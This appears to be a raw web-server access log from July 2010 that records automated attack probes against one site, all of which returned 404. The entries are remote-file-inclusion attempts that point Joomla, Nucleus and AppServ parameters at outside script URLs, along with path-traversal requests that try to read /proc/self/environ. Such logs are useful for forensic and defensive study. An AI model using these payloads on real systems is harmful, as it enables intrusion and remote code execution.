83.16.100.218 - - [01/Jul/2010:22:31:34 -0700] "GET /logs/access.log/administrator/components/com_pinboard/install.pinboard.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:22:33:39 -0700] "GET /administrator/components/com_visualrecommend/admin.visualrecommend.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:22:34:05 -0700] "GET /logs/administrator/components/com_visualrecommend/admin.visualrecommend.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:22:34:05 -0700] "GET /logs/access.log/administrator/components/com_visualrecommend/admin.visualrecommend.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:22:34:26 -0700] "GET /logs/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:22:34:26 -0700] "GET /components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:22:34:26 -0700] "GET /logs/access.log/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:22:39:10 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:22:39:12 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:22:39:12 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:22:39:26 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:22:39:26 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:22:39:26 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:22:55:31 -0700] "GET /logs/access.log//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:22:55:31 -0700] "GET /logs//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:22:55:31 -0700] "GET /nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:14:38 -0700] "GET /logs/access_100601.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://our.anet.com//modules/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:14:42 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://our.anet.com//modules/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:14:42 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://our.anet.com//modules/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:19:00 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:19:03 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:19:05 -0700] "GET /logs/access.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:20:05 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://our.anet.com//modules/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:20:05 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://our.anet.com//modules/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:20:05 -0700] "GET /logs/access_100601.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://our.anet.com//modules/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:20:05 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://our.anet.com//modules/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:20:05 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://our.anet.com//modules/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:20:05 -0700] "GET /logs/access_100601.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://our.anet.com//modules/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:22:02 -0700] "GET /logs//main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:22:05 -0700] "GET /logs/access_100501.log//main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:22:08 -0700] "GET /main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:22:17 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:22:22 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:22:25 -0700] "GET /appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:24:16 -0700] "GET /appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:24:16 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:24:16 -0700] "GET /logs/access_100501.log//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:25:56 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:25:57 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:25:58 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:26:38 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:26:38 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:26:38 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:26:38 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:26:38 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:26:39 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:26:49 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:26:49 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:26:49 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:29:09 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:29:09 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:29:10 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:29:10 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:29:10 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:29:12 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:29:19 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:29:19 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:29:22 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
195.189.95.54 - - [01/Jul/2010:23:29:27 -0700] "GET /logs/access_100501.log/index.php?option=com_remository&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
195.189.95.54 - - [01/Jul/2010:23:29:27 -0700] "GET /index.php?option=com_remository&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
195.189.95.54 - - [01/Jul/2010:23:29:28 -0700] "GET /logs/index.php?option=com_remository&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:30:32 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://our.anet.com//modules/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:30:32 -0700] "GET /logs/access_100601.log//components/com_virtuemart/errors.php?error=http://our.anet.com//modules/1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.245.214.42 - - [01/Jul/2010:23:30:32 -0700] "GET /components/com_virtuemart/errors.php?error=http://our.anet.com//modules/1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:30:54 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:30:54 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:30:57 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:31:05 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:31:08 -0700] "GET /appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:31:10 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:31:14 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:31:14 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:31:14 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:31:31 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:31:31 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:31:32 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:32:30 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:35:48 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:35:54 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:36:40 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:40:49 -0700] "GET /logs/access_100501.log//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:40:54 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:40:54 -0700] "GET /appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:41:08 -0700] "GET /logs/access_100501.log//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:41:08 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:41:13 -0700] "GET /appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:28 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:28 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:29 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:29 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:29 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:29 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:29 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:29 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:29 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:37 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:37 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:37 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:46 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:46 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:46 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:47 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:47 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [01/Jul/2010:23:41:47 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:41:54 -0700] "GET /appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:42:00 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:42:03 -0700] "GET /logs/access_100501.log//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:43:17 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:43:17 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
78.41.233.128 - - [01/Jul/2010:23:43:41 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
78.41.233.128 - - [01/Jul/2010:23:43:41 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:45:31 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:46:16 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:46:17 -0700] "GET /logs/access_100601.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:46:17 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:46:18 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:47:54 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
